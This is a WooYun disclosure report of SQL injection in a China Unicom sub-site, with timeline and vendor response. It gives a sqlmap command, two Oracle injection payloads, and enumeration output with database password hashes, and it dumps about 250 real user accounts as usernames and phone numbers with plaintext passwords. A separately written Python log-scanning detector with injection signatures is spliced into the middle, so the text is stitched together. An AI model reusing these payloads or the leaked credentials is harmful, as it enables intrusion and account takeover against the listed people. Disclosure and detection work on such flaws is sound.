Vulnerability summary
Title: Carrier security: SQL injection in a China Unicom business sub-site
Submitted: 2015-12-01 13:38
Fixed: 2016-01-18 13:50
Published: 2016-01-18 13:50
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 12
Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling
Tags: none
Vulnerability details. Disclosure status:
2015-12-01: details sent to the vendor, awaiting vendor handling
2015-12-04: vendor confirmed; details visible to the vendor only
2015-12-14: details opened to core white hats and domain experts
2015-12-24: details opened to regular white hats
2016-01-03: details opened to intern white hats
2016-01-18: details opened to the public
Brief description:
Details:
./sqlmap.py -u "http://**.**.**.**:80/tmap/map_unicom_list.asp?province=31&type=1&name=1&companytype=11&page=1" -p name

---
Parameter: name (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: province=31&type=1&name=1' AND 8515=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8515=8515) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'WRhY' LIKE 'WRhY&companytype=11&page=1

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: province=31&type=1&name=1' AND 7020=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'UZfg' LIKE 'UZfg&companytype=11&page=1
---
[12:01:22] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] TSH_CMS
[*] _NEXT_USER [1]: password hash: NULL [*] ANONYMOUS [1]: password hash: anonymous [*] AQ_ADMINISTRATOR_ROLE [1]: password hash: NULL [*] AQ_USER_ROLE [1]: password hash: NULL [*] AUTHENTICATEDUSER [1]: password hash: NULL [*] CONNECT [1]: password hash: NULL [*] CTXAPP [1]: password hash: NULL [*] CTXSYS [1]: password hash: 71E687F036AD56E5 [*] CWM_USER [1]: password hash: NULL [*] DBA [1]: password hash: NULL [*] DBSNMP [1]: password hash: 8A7084606AE5EB5C [*] DELETE_CATALOG_ROLE [1]: password hash: NULL [*] DIP [1]: password hash: CE4A36B8E06CA59C clear-text password: DIP [*] DMSYS [1]: password hash: BFBA5A553FD9E28A [*] EJBCLIENT [1]: password hash: NULL [*] EXECUTE_CATALOG_ROLE [1]: password hash: NULL [*] EXFSYS [1]: password hash: 66F4EF5650C20355 [*] EXP_FULL_DATABASE [1]: password hash: NULL [*] GATHER_SYSTEM_STATISTICS [1]: password hash: NULL [*] GLOBAL_AQ_USER_ROLE [1]: password hash: GLOBAL [*] HS_ADMIN_ROLE [1]: password hash: NULL [*] IMP_FULL_DATABASE [1]: password hash: NULL [*] JAVA_ADMIN [1]: password hash: NULL [*] JAVA_DEPLOY [1]: password hash: NULL [*] JAVADEBUGPRIV [1]: password hash: NULL [*] JAVAIDPRIV [1]: password hash: NULL [*] JAVASYSPRIV [1]: password hash: NULL [*] JAVAUSERPRIV [1]: password hash: NULL [*] LOGSTDBY_ADMINISTRATOR [1]: password hash: NULL [*] MDDATA [1]: password hash: DF02A496267DEE66 clear-text password: MDDATA [*] MDSYS [1]: password hash: 72979A94BAD2AF80 [*] MGMT_USER [1]: password hash: NULL [*] MGMT_VIEW [1]: password hash: 935F95FB02BB4765 [*] OEM_ADVISOR [1]: password hash: NULL [*] OEM_MONITOR [1]: password hash: NULL [*] OLAP_DBA [1]: password hash: NULL [*] OLAP_USER [1]: password hash: NULL [*] OLAPI_TRACE_USER [1]: password hash: NULL [*] OLAPSYS [1]: password hash: 4AC23CC3B15E2208 [*] ORACLE_OCM [1]: password hash: 5A2E026A9157958C [*] ORDPLUGINS [1]: password hash: 88A2B2C183431F00 [*] ORDSYS [1]: password hash: 7EFA02EC7EA6B86F clear-text password: ORDSYS [*] OUTLN [1]: password hash: 
4A3BA55E08595C81 [*] PUBLIC [1]: password hash: NULL [*] RECOVERY_CATALOG_OWNER [1]: password hash: NULL [*] RESOURCE [1]: password hash: NULL [*] SCHEDULER_ADMIN [1]: password hash: NULL [*] SELECT_CATALOG_ROLE [1]: password hash: NULL [*] SI_INFORMTN_SCHEMA [1]: password hash: 84B8CBCA4D477FA3 clear-text password: SI_INFORMTN_SCHEMA [*] SJSC [1]: password hash: F78A2CA3C9FC1704 clear-text password: SJSC [*] SYS [1]: password hash: 75800913E1B66343 [*] SYSMAN [1]: password hash: 28F72A3C2D75FDE9 [*] SYSTEM [1]: password hash: 970BAA5B81930A40 [*] TSH_CMS [1]: password hash: AB00BC770037B5D7 [*] TSMSYS [1]: password hash: 3DF26A8B17D0F29F [*] UNISK_TEST [1]: password hash: 273DB3E97685FF90 [*] UNITEST [1]: password hash: A2E8021EA6E17874 clear-text password: UNITEST [*] UNIWO [1]: password hash: FF370F03D3985606 clear-text password: UNIWO [*] WM_ADMIN_ROLE [1]: password hash: NULL [*] WMSYS [1]: password hash: 7C9BA362F8314299 [*] XDB [1]: password hash: 88D8364765FCE6AF [*] XDBADMIN [1]: password hash: NULL [*] XDBWEBSERVICES [1]: password hash: NULL
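The two probe shapes sqlmap reports above (an XMLType() error-based payload that builds its marker strings from CHR() concatenations, and an ALL_USERS self cross-join used as a heavy query for time-based blind detection) leave distinctive traces in the web server's request log. The following is an added example for this report, not code from the report or from the vendor: it scans IIS W3C log text, checks every query-string parameter against signatures derived from those two shapes, and decodes CHR()||CHR() sequences so an analyst can see the string the probe assembled. The field layout in FIELDS, the sample log lines and the IP addresses are all constructed assumptions; adjust FIELDS to the #Fields: header of the logs you actually have.

```python
"""Flag Oracle error-based / time-based SQL injection probes in IIS W3C logs.

Added example; not code from the report or the vendor. The field layout below is
an assumption (a common IIS W3C selection); the log lines are constructed.
"""
import re
from urllib.parse import parse_qsl

# Assumed W3C field order; positions are looked up by name so the layout lives in one place.
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]
IDX = {name: i for i, name in enumerate(FIELDS)}

# Signatures taken from the probe shapes in the report: XMLType() error extraction,
# CHR()||CHR() string building, and the ALL_USERS self cross-join that sqlmap uses
# as a "heavy query" for Oracle time-based blind detection.
RULES = {
    "oracle_xmltype_error_based": re.compile(r"\bXMLType\s*\(", re.I),
    "oracle_chr_concatenation": re.compile(r"\bCHR\(\d+\)\s*\|\|\s*CHR\(\d+\)", re.I),
    "oracle_all_users_heavy_query": re.compile(
        r"\bFROM\s+ALL_USERS\s+\w+\s*,\s*ALL_USERS\b", re.I),
}
# One contiguous run of CHR(n)||CHR(m)||... (stops at anything that is not CHR()).
CHR_SEQ = re.compile(r"\bCHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))*", re.I)

# Constructed sample log (documentation-range IPs). Lines 2 and 3 mirror the two
# sqlmap payload shapes from the report; lines 1 and 4 are benign requests.
SAMPLE_LOG = """\
2015-12-01 04:01:22 10.0.0.5 GET /tmap/map_unicom_list.asp province=31&type=1&name=1&companytype=11&page=1 80 - 198.51.100.7 sqlmap/1.0 200
2015-12-01 04:01:23 10.0.0.5 GET /tmap/map_unicom_list.asp province=31&type=1&name=1'+AND+8515%3D(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113)||(SELECT+(CASE+WHEN+(8515%3D8515)+THEN+1+ELSE+0+END)+FROM+DUAL)||CHR(113)||CHR(98)||CHR(122)||CHR(113)||CHR(113)||CHR(62)))+FROM+DUAL)+AND+'WRhY'+LIKE+'WRhY&companytype=11&page=1 80 - 198.51.100.7 sqlmap/1.0 500
2015-12-01 04:01:31 10.0.0.5 GET /tmap/map_unicom_list.asp province=31&type=1&name=1'+AND+7020%3D(SELECT+COUNT(*)+FROM+ALL_USERS+T1,ALL_USERS+T2,ALL_USERS+T3,ALL_USERS+T4,ALL_USERS+T5)+AND+'UZfg'+LIKE+'UZfg&companytype=11&page=1 80 - 198.51.100.7 sqlmap/1.0 200
2015-12-01 04:02:05 10.0.0.5 GET /tmap/map_unicom_list.asp province=31&type=1&name=%E5%8C%97%E4%BA%AC&companytype=11&page=2 80 - 203.0.113.9 Mozilla/5.0 200
"""


def decode_chr(fragment: str) -> str:
    """Turn 'CHR(60)||CHR(58)' into '<:' so analysts see the string the probe built."""
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", fragment, re.I))


def scan_query(raw_query: str) -> list:
    """Check every parameter value of one cs-uri-query; return one finding per hit."""
    findings = []
    # parse_qsl percent-decodes and turns '+' back into spaces, as the server would.
    for param, value in parse_qsl(raw_query, keep_blank_values=True):
        hits = [name for name, rx in RULES.items() if rx.search(value)]
        if not hits:
            continue
        decoded = [decode_chr(m.group(0)) for m in CHR_SEQ.finditer(value)
                   if "||" in m.group(0)]
        findings.append({"param": param, "rules": hits, "decoded_strings": decoded})
    return findings


def scan_log(text: str) -> list:
    """Scan W3C log text; skip comment and short lines; annotate hits with context."""
    results = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(" ")
        if len(fields) < len(FIELDS):
            continue
        for finding in scan_query(fields[IDX["cs-uri-query"]]):
            finding.update({"time": fields[IDX["date"]] + " " + fields[IDX["time"]],
                            "client": fields[IDX["c-ip"]],
                            "uri": fields[IDX["cs-uri-stem"]],
                            "status": fields[IDX["sc-status"]]})
            results.append(finding)
    return results


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["uri"], f["param"], f["rules"], f["decoded_strings"])
```

The decoded strings for the error-based probe come out as the opening and closing marker pair sqlmap wraps around the extracted value, which is why that rule is worth keeping even when XMLType is renamed or obfuscated in later tooling. Matching is done on the decoded parameter value rather than the raw query so that URL encoding of `=`, `(` or spaces does not hide the signature; a `500` on the XMLType request and a normal `200` on the heavy query is the response pattern you would expect when the injection succeeds, and it is useful to correlate with the request-side match.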
Proof of vulnerability:
+------------------+--------------------------------------------+------+ | USERNAME | PASSWORD | MAIL | +------------------+--------------------------------------------+------+ [14:39:17] [WARNING] console output will be trimmed to last 256 rows due to large table size | 15611112502 | dididi | NULL | | suhua | 751226 | NULL | | Zlakiroran | 19861224 | NULL | | yangyonghong | 20010804 | NULL | | mengqk | 600212 | NULL | | tz6lbj | 666666 | NULL | | jiali906 | 850906 | NULL | | bintang | dubint | NULL | | 13104683304 | 123456 | NULL | | suifengerqu | 541888 | NULL | | 13011530114 | 13011530114 | NULL | | 15612036025 | 15612036025 | NULL | | 13003610508 | 13003610508 | NULL | | 18642900631 | 7034030 | NULL | | 1864111 | 870306 | NULL | | shanhewose | a19890701 | NULL | | 18641112809 | 123456 | NULL | | lcliuliu | 123456 | NULL | | mmibb | mm | NULL | | santongfan | fantaoWUUNI | NULL | | zhaozd | 123456 | NULL | | lcyy | lhbhi20060318 | NULL | | loveyou | lcylovesq1314 | NULL | | ccc111cc | ccc111 | NULL | | wangxx | 135790 | NULL | | GLCHENG | mtwfhqpy | NULL | | hongqi93 | 100789 | NULL | | lanmao | 20890701 | NULL | | zhoukaixuan | 111222 | NULL | | mallpall | 421514 | NULL | | liusg36 | 922384 | NULL | | ZHANJUN | 101715 | NULL | | 18641119588 | 18641119588 | NULL | | ewsd1240 | yxb0305 | NULL | | ffy123 | DLffy123 | NULL | | hebiao | 840921 | NULL | | 15637101282 | 123456 | NULL | | ibincn | zhangbin930812 | NULL | | lmj16578658 | 916718 | NULL | | 15637006129 | 006129 | NULL | | 15554163558 | 710310 | NULL | | renny | 535106 | NULL | | 15513075167 | 15513075167 | NULL | | yingzi | cwz741109 | NULL | | hnsmxxr | abc123 | NULL | | 116117 | 116117 | NULL | | stillme | wang10121986 | NULL | | 992478972 | 516536 | NULL | | liantng131 | 13134175685 | NULL | | 18641115750 | 123456 | NULL | | cpcuibm | 191028 | NULL | | sovi | 147258 | NULL | | Gaoxzcf | 13519025155 | NULL | | 15609715655 | 111111 | NULL | | yushijin | 123456 | NULL | | fax6688 | 800120 | NULL | | 
ghostli100 | 19890118 | NULL | | leizi | 154813519 | NULL | | gotoyes | 200300 | NULL | | 1057 | 20102010 | NULL | | dhl0118 | 782163 | NULL | | gvei | gvei169 | NULL | | baoxiuyun | 730211 | NULL | | xjmacky | 760526 | NULL | | 13193148804 | 111111 | NULL | | ymeng | 123456 | NULL | | 13014512670 | 839502 | NULL | | aaaa | 761216 | NULL | | 15516945883 | 15516945883 | NULL | | 326034825 | 1108865595 | NULL | | yangyong | 412726 | NULL | | jixinhua | 198610 | NULL | | 13259792689 | 000000 | NULL | | 13277226161 | 111222 | NULL | | 1598 | 131132 | NULL | | wo186 | 131132 | NULL | | shanshui | 988989 | NULL | | chenlong1982 | 562743 | NULL | | suixiaogang | 198726 | NULL | | seamanlay | 5667561 | NULL | | 9060 | 983986 | NULL | | 1395 | 168600 | NULL | | qingyuan | 925123 | NULL | | tonydhj | dhj5211314 | NULL | | yangguangjiyi | 410325325410 | NULL | | chenlifeng | chen13076799410 | NULL | | chinacows | woaini19850622 | NULL | | 809298077 | cpj49928 | NULL | | Lauken | 330410 | NULL | | zhiqiu | 100100981031 | NULL | | ABCD1107631825 | 031125 | NULL | | lujiaolong | 04050905 | NULL | | ahat | 720507 | NULL | | xiangxiang | 909955 | NULL | | cheng | chengyining2007 | NULL | | yfsok | 62665822 | NULL | | 446209495 | xing13266416556 | NULL | | haode | 0306 | NULL | | a46182898 | a19870205 | NULL | | wxhwrygj | 14971590 | NULL | | 8622 | 850178 | NULL | | wuqian520 | shizhongruyiqian | NULL | | Lijh | li56780 | NULL | | 574006683 | 3021087 | NULL | | trx00000 | 780720 | NULL | | yjpyjp | 733209 | NULL | | q703986096 | 101901 | NULL | | weixl | 114263 | NULL | | 13297666826 | 768203 | NULL | | 13204385056 | 13204385056 | NULL | | 798388561 | 13409201794 | NULL | | 13280801626 | 1626 | NULL | | sntewg | 870713 | NULL | | 282413 | 101707 | NULL | | gbz18 | 189376 | NULL | | liuyanginchina | 371522 | NULL | | 18656611719 | 737499 | NULL | | lijiang1006 | ok13963099724 | NULL | | 7919 | 131132 | NULL | | ylqs001 | iedibrd5 | NULL | | 7933 | 198312 | NULL | | 868498 | 131132 
| NULL | | 0395 | 131132 | NULL | | qwertyuiop | 147258 | NULL | | wangtao | 853260 | NULL | | yanghong | 123456789 | NULL | | yanpen | 198403 | NULL | | zhangkai | zhangkai | NULL | | pelva | 820625 | NULL | | 15636050408 | 691910 | NULL | | shibo | 60236435231 | NULL | | QINHUIXIN | 123456 | NULL | | huangwei | 123456789 | NULL | | 15585535380 | 680326680326 | NULL | | long | ojl | NULL | | mechelle | 11701170 | NULL | | ym3188 | 112019 | NULL | | 15948009185 | 123456 | NULL | | jlbclwt | 58541240 | NULL | | et1987 | et1987 | NULL | | aqatg20110906 | 392691 | NULL | | smxlhl | 2863079 | NULL | | 13212003558 | 19840302 | NULL | | mininaso | miyuxin | NULL | | sy123321 | 135246 | NULL | | 18641116753 | 18641116753 | NULL | | dlxhrj | 495602 | NULL | | zhaicj1 | 123321 | NULL | | 18604921297 | 861120 | NULL | | fenxiang | 19770428 | NULL | | wangsuiyi | 412413 | NULL | | gxl2011 | 654321 | NULL | | huyiling | 915915 | NULL | | zakuan | aa123456 | NULL | | bhrc | 123456a | NULL | | yf661 | 131132 | NULL | | sjz881 | 131132 | NULL | | zhanglishang | rshqch2009 | NULL | | zgf869 | dlpass9869 | NULL | | unisk001 | 20001123 | NULL | | zhangliping | 198610 | NULL | | xinyue | 198610 | NULL | | sk9998 | 117988 | NULL | | lxxycl | yang9257954 | NULL | | haidao | 710224 | NULL | | 13277226262 | 111222 | NULL | | yangyang | 549175 | NULL | | ltwz | 9365131 | NULL | | xadf001 | 12837123 | NULL | | 4921998 | lei20031022 | NULL | | csic_lw | 15319907931 | NULL | | wangxu | 1234 | NULL | | qingxian | 653368 | NULL | | jaycntw1 | 1990531 | NULL | | 907396 | 201310 | NULL | | bynd419 | 002315 | NULL | | wsb76778945 | 951357 | NULL | | 13256308679 | 222222 | NULL | | hero191000 | 8272882728 | NULL | | shaniuniu | 494662493 | NULL | | hl8865067 | 830801 | NULL | | 821829540 | 880815 | NULL | | wu0019 | 830111 | NULL | | 13098444446 | 111222 | NULL | | ZHAOQIANG | 19910110 | NULL | | 1589 | 131132 | NULL | | fayen | 123456 | NULL | | laoma | 6602618 | NULL | | mingzhu | 662256 | NULL 
| | 18602896237 | 252831 | NULL | | 15607360638 | 822600 | NULL | | 15607360639 | 000111 | NULL | | teldzh | taoenli | NULL | | chinaunicom | 123456 | NULL | | shenxiaoqiao | 800526 | NULL | | yangangyuan | 230201 | NULL | | 68834634 | 010010001a | NULL | | 454084893 | 511123 | NULL | | hp815 | 188486 | NULL | | love_880809 | 809809 | NULL | | wsniuxiaoniu | 12908819niu | NULL | | 547914367 | 917190 | NULL | | sun0000 | 830618 | NULL | | jinyanfighting | jinyan0710 | NULL | | kalen | 13756045542 | NULL | | 13253469087 | 555555 | NULL | | zzybv | 756430 | NULL | | dongxiahaohao | zhangdongxia | NULL | | 15637809263 | 881213 | NULL | | mxy3000 | 4172705 | NULL | | 735667822 | 13071031803 | NULL | | leiboby | 123465 | NULL | | 15639609281 | 790417 | NULL | | gongzheng | gongzheng | NULL | | kfhglt | li8282033 | NULL | | zhouhui888 | 811111 | NULL | | fxgfan | 0210746 | NULL | | hnsc888 | 761217 | NULL | | weilai | abc | NULL | | longbao1126 | 19921126 | NULL | | yueastor | 274256601 | NULL | | 453867817 | a64758053 | NULL | | yangjunlei | yangjunlei | NULL | | wanglibin | 721545 | NULL | | wwweizhen | 15837975923 | NULL | | leungloh | WiFi3GChina | NULL | | 376386271 | 19890910 | NULL | | dxtjy | 123456 | NULL | | 3655 | 13014593655 | NULL | | hbqinbo | hnqinbo | NULL | | ycy1022 | 404470019 | NULL | | 131371723231 | 052217 | NULL | | yangand2008 | 197259 | NULL | | zhuchangyong | 13290965985 | NULL | | ilsunbo | sunbohao | NULL | | yinkunji8888 | 2525131425 | NULL | | a76740087 | 76740087 | NULL | | 15637102026 | hy5668518 | NULL | | 880815 | 821829540 | NULL | | 15585302777 | 521512 | NULL | | 666666 | 200300 | NULL | | shenxiaomei | 657306 | NULL | | wxyh | lhbhi20060318 | NULL | | 13220226687 | gao7322845 | NULL | | 13242440255 | 0807 | NULL | | zhujing6 | 001368 | NULL | | kouhz1 | 111111 | NULL | | Houzj8 | hzj670624 | NULL | | lczx | 000635 | NULL | | Andy | 888999 | NULL | | 2653 | 131132 | NULL | | 18651278512 | 612523 | NULL | | asdf | 376891217 | NULL | | 
83377948 | 19850612 | NULL | | 13146300852 | 820222 | NULL | | 13146601103 | 6601103 | NULL | +------------------+--------------------------------------------+------+
Fix recommendation:

Copyright notice: reproduce only with attribution to 李旭敏 @乌云 (WooYun).
Vulnerability response
Vendor response:
Severity: High
Rank: 10
Confirmed: 2015-12-04 13:44
Vendor reply: CNVD confirmed and reproduced the described issue; it has been passed via CNCERT to China Unicom Group, which will coordinate follow-up handling with the site's administration department.
Latest status: none